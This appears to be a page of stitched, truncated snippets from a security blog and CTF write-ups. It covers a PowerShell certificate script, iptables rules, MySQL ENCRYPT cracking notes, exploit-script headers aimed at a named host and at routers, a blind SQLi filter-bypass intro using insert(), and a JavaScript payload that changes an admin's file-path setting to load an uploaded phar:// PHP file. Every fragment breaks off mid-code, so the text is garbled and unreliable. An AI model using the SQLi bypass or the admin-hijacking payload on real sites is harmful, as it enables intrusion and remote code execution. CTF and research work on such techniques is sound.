Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
# derived from http://stackoverflow.com/questions/40046916/how-to-grant-permission-to-user-on-certificate-private-key-using-powershell
param (
    [string]$certThumbprint = "NothingToDoHere"
)
$serviceAccount = 'NETWORK SERVICE'
$permissionType = 'Read'
try
{
    Write-Host "Thumbprint: $certThumbprint"
    #Clear Existing Variables
#!/usr/bin/python -u
#-*-coding: utf-8-*-
def list_directory(expression):
    try:
        _c = __import__("glob").glob(expression + "/*")
        for i in xrange(len(_c)):
            if "uploads" not in _c[i] and "userimage" not in _c[i] and "files" not in _c[i]:
                _c.extend(list_directory(_c[i]))
        return _c
    except:
encryption-functions from mysql.com
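With ENCRYPT(x) alone the challenge is probabilistically unsolvable, but once a salt value is set the first few characters of the output come out the same, so the number of possibilities drops considerably.
The output of ENCRYPT(x,y) is made up of the characters A-Za-z0-9./, which still makes it probabilistically hard, but the strtolower($var) in the challenge reduces the possibilities a second time.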
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
<?php
function generator()
{
    $PATH = "./s3cre7_fi1e";
    $init_seed = 0;
    if(!file_exists(realpath($PATH)))
    {
        $init_seed = $seed = intval(uniqid(),10);
        $f = fopen($PATH,"w");
        fwrite($f,$init_seed);
There are several ways to bypass blind SQLi filters, and today I will introduce a MySQL blind SQLi payload that uses the insert() function.
Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should still be valid in most SQL dialects.
This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...) are blocked by the script.
#!/usr/bin/python -u
#-*- coding: utf-8 -*-
# Developer: Harold Kim(root@stypr.com)
import os
import sys
import re
import requests
class iptime:
// Payload for the uploaded file.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// Before the attack, first check whether this is an administrator that supports the feature.
$.get(`../qa_config.php`, function(d){
    // The place to modify is the one containing the "file path", so check only that part first.
    if(d.indexOf(`상단 파일 경로`) !== -1){